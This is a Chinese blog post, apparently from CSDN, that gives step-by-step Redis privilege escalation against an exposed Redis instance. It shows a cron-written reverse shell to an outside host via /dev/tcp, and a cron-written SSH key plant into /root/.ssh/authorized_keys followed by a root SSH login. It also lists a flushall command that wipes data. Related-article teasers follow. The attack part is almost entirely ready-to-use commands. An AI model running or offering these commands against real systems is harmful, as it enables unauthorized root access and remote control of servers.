Redis提权

最新推荐文章于 2024-10-01 11:12:34 发布
最新推荐文章于 2024-10-01 11:12:34 发布
阅读量289 收藏 1
点赞数 4
分类专栏: Linux提权 文章标签: redis 数据库 缓存
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_68636078/article/details/142441876
版权

前提

成功连接Redis

基础命令

# 连接redis
redis-cli -h 192.168.100.47

# 基础命令
set key value
get key
del key

# 切换到数据库1,默认是0
select 1
set key_num 1

# 数字型参数加1
incr key_num

# 为列表赋值
rpush phone 13012345678 13187654321 19998765432

# 获取列表值
lindex phone 1

# 清空全部key
flushall

# 获取配置文件里的参数
config get requirepass

# 获取数据存储目录
config get dir

# 获取数据库文件名
config get dbfilename
config set key value
save

# 查询存在哪些键
SCAN 0 match * count 100

一、计划任务提权

1、连接redis后,设置task变量为反弹shell

set task "\n\n */1 * * * * /bin/bash -ip >& /dev/tcp/192.168.244.201/9999 0>&1 \n\n"

 2、更改数据存储目录为

config set dir /var/spool/cron

3、设置 Redis 数据库的持久化文件名为root

config set dbfilename root

4、保存

save

5、退出reids,到crontab目录下查看计划任务

cd /var/spool/cron/root
crontab -l

 6、在kali进行监听

 二、SSH提权

1、在kali上生成公私钥对

ssh-keygen -t rsa

key / key.pub

2、在Redis(Liunx)上创建/root/.ssh目录

set mkdir "\n\n */1 * * * * mkdir /root/.ssh \n\n"

3、检查是否创建成功,并切换到目录下

config set dir /root/.ssh

4、将kali公钥导入Redis

set mkdir "\n\n */1 * * * * echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCjqv12Xd57BHnBkwfeNFYnKyZvNVSMYBSNMCiyaK4ncJ7Ne25o30Dn4KHJYUNI7XVhB4ygSilJ1MarCpThjfTdhi65Qs1eqRZBI2G7U/FTwKO+ht0UX9h9xsOfX9IWbz4pxWYnW2aRFg7QQys6P+5fGlsbHLAq9pV1iwSSp0U2TXhoBlKeB883RkFVTOUR/R0Vk3CjQ/JSRYfYu6wCyGVNHV+3AWmhh8QHTZW7AboXFspteoA81GbOXu42vgmvWcopyVuLbFVK7x34X/U1t64XqzUpCGedgyhuvBevmkrNKAL8S3jQE2htDB/NGkCOHzNSJdNFpTNNI6kuOV9sCW53jKoSE6XZGKhKuW7KRFkMEeEYZyGEQR9QEezPTt9N5F0cZDybt9J79GOJTyJvhAo7ucbro8MP/pRHQJEW2g/GUPDVAcePfI1RLmNOvA77W9hl9LVrCy9lYgNLtmomDaGf2PnT3JwcvY5u0TUb6s82f9A3r9K6G5jSQKRY0+k+/nM= root@kali' >/root/.ssh/authorized_keys \n\n"

5、更改数据存储目录为

config set dir /var/spool/cron

6、设置 Redis 数据库的持久化文件名为root

config set dbfilename root

7、保存

save

8、kali登录

ssh -i key root@192.168.244.149

可乐葡萄糖
关注
专栏目录
权限提升之数据库——Redis和PostgreSQL提权方式
m0_61506558的博客
10-17 726
通过之前对Access、MSSQL(SQL server)和Mysql注入的介绍,大家对数据库提权方式有了一定的认知,我认为耗时间的是Access,这和它开发的理念有直接的关系,而本次介绍的是Redis和PostgreSQL的提权,和之前提权利用的点很相似,会利用到系统自带独特的方式,主要集中在配置文件发生问题,进行反弹连接,进行渗透。权限提权——Win提权漏洞及数据库&AT&SC&PS提权__Cyber的博客-CSDN博客。
redis提权漏洞处理
u011105165的博客
05-17 371
ps -ef | grep ddg | awk "{print $2}" | xargs kill -9 ps -ef | grep wnT| awk "{print $2}" | xargs kill -9 rm -rf /tmp/ddg.* rm -rf /tmp/wnK* service crond stop rm -rf /var/spool/cron service crond start crontab -e #写入备份的crontab 检查~/.ssh/下的 证书文件是否正常 #...
提权 - Redis/Postgre数据库
acepanhuan的博客
03-01 622
提权 - Redis/Postgre数据库
[天翼杯 2021]esay_eval-----记Redis提权
qq_73767109的博客
06-25 204
一旦攻击者获得了访问权限,他们就可以上传 exp.so 文件到 Redis 服务器中,并使用 Redis 的 module load 命令加载这个文件。exp.so 文件是一个 Redis 模块,它提供了一些命令和功能,可以让攻击者在 Redis 服务器中执行任意代码,从而获得服务器的控制权。Vim缓存泄露指的是当用户在Vim编辑器中打开了一个文件,并进行了修改,然后使用了Vim或其他工具关闭了该文件,但Vim缓存中仍然保留着该文件的副本,从而导致该文件中的敏感信息(例如密码、私密密钥等)泄露的漏洞。
提权redis3种未授权访问
梳碧湖的砍柴人
10-07 710
redis及部分提权
redis未授权访问漏洞三种提权方式
FryhRx的博客
04-10 9059
redis未授权访问漏洞三种提权方式 文章目录redis未授权访问漏洞三种提权方式前言一、redis是什么?二、漏洞利用条件1. redis绑定在 0.0.0.0:6379,且没有进行添加防火墙规则避免其他非信任来源ip访问等相关安全策略,直接暴露在公网。2.没有设置密码认证(一般为空),可以免密码远程登录redis服务。三、漏洞利用1、利用redis写webshell2、写ssh-keygen公钥然后使用私钥登陆3、Redis 写入计划任务四、 Redis未授权访问防御方法 前言 扫描/连接默认的63
数据库提权Redis未授权访问常见提权方式
ssrf
03-02 926
目录0x001 验证是否存在未授权访问0x002 利用计划任务执行命令反弹shell0x003 通过向Web目录中写webshell的方式进行getshell0x004 通过写SSH key的方式进行getshell0x005 修复方案 0x001 验证是否存在未授权访问 Redis在默认情况会将服务绑定在6379端口上,从而将服务暴露在公网环境下,如果在没有开启安全认证的情况下,可以导致任意用户未授权访问Redis服务器并Redis进行读写等操作。 使用redis客户端redis-cli.exe连接,
[天翼杯 2021]esay_eval——Redis(主从复制)提权初见
Leaf_initial的博客
04-18 749
但是,当编辑操作意外终止时,这个备份文件就会保留,如果多次编辑文件都意外退出,备份文件并不会覆盖,而是以 swp、swo、swn 等其他格式,依次备份。在开发人员使用 vim 编辑器 编辑文本时,系统会自动生成一个备份文件,当编辑完成后,保存时,原文件会更新,备份文件会被自动删除。文件是一个 Redis 模块,它提供了一些命令和功能,可以让攻击者在 Redis 服务器中执行任意代码,从而获得服务器的控制权。顺理成章的,B类中的__destruct()方法明显访问了调用对象中不存在的方法,所以上一级便是他。
Linux 提权学习
Goodric的博客
04-15 936
提权的目的是获取 root 权限 root 权限可获取 shadow 文件中的密码 Hash,若内网环境中存在「账户/密码复用」的情况,可用于横向扩展
python脚本实现Redis未授权批量提权
09-09
本文将深入探讨如何利用 Python 脚本来针对未授权的 Redis 实例进行批量提权。 首先,了解 Redis 的安全隐患至关重要。如果 Redis 配置不当,允许从任意 IP 访问且未启用身份验证,攻击者可以轻易地连接到 Redis ...
第61天:权限提升-Redis&Postgre&令牌窃取&进程注入1
08-03
本文以“第61天:权限提升-Redis&Postgre&令牌窃取&进程注入1”为主题,探讨了四种不同的提权策略,分别是通过数据库应用提权Redis数据库权限提升、PostgreSQL数据库权限提升以及Windows系统的令牌窃取和进程注入...
redis攻击还原
10-05
进一步地,攻击者还可以利用Redis的某些内置功能来提升权限,这就是所谓的“Redis提权”。比如,Redis可以配置为绑定到所有接口上,这样攻击者就可通过网络远程访问。结合Redis的“SAVE”命令,攻击者可以强迫Redis...
Redis: 持久化之RDB和AOF
Wang的专栏
09-29 966
Redis 有一个高质量的课题:数据安全性与数据可靠性Redis 是一个内存型数据库,数据大部分都是存在内存里面当信息在内存中流通时,Redis 节点突然就故障挂掉当重新启动的时候,内存中的数据肯定是全部丢失了如果在这种情况下,Redis 提供了对应的持久化方案,它有两种持久化方案RDB和AOF可以把内存中的数据保存到磁盘,避免数据的流失关于RDB,我们需要了解到什么是持久化什么是快照RDB的工作原理,包括它的优点和缺点关于AOF,需要知道为什么需要有AOF。
Redis-持久化
qq_74812898的博客
09-28 910
redis持久化
Redis-持久化机制
最新发布
qq_39007838的博客
10-01 700
配置文件redis 6.0.16 及其以下补充一张来自于的图片写回策略,对应图中的 3 也即上面个图的 fsync 策略。
Redis篇(环境搭建)
wlcass zhengge blog
09-26 803
Windows系统中启动Redis,直接双击redis-server.exe即可启动Redis服务,redis服务默认端口号为6379。双击 redis-cli.exe 即可启动Redis客户端,默认连接的是本地的Redis服务,而且不需要认证即可连接成功。前面我们已经启动了Redis服务,默认情况下Redis启动后是在前台运行,而且客户端不需要密码就可以连接到。如果没有指定,就说明可以接受。通过 redis-cli 可以连接到本地的Redis服务,默认情况下不需要认证即可连接成功。
Python对数据库(MySQL,redis、MongoDB)的操作
wu73guang5jian的博客
09-27 1474
python对MySQL、Redis,MongoDB的操作
Redis】主从复制(下)--主从复制原理和流程
2301_78320637的博客
09-27 925
存在数据则直接发送给从节点,这样就可以保持主从节点复制的一致性.补发的这部分数据一般远远小于全量数据,所以减少了开销.,默认大小是1MB,当主节点连接从节点的时候被创建,这时主节点响应写命令时,不但会把命令发送给从节点,还会写入。的方式,源源不断的输给从节点.从节点就会根据这些请求来同时修改自身的数据,从而保证和主节点数据的一致性.:主节点的复制id,主节点重新启动,或者从节点晋级成主节点,都会生成一个。在网络传输的时间,从节点清空旧数据的时间,从节点加载。的时间,主节点就会认为从节点故障并中断复制连接。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值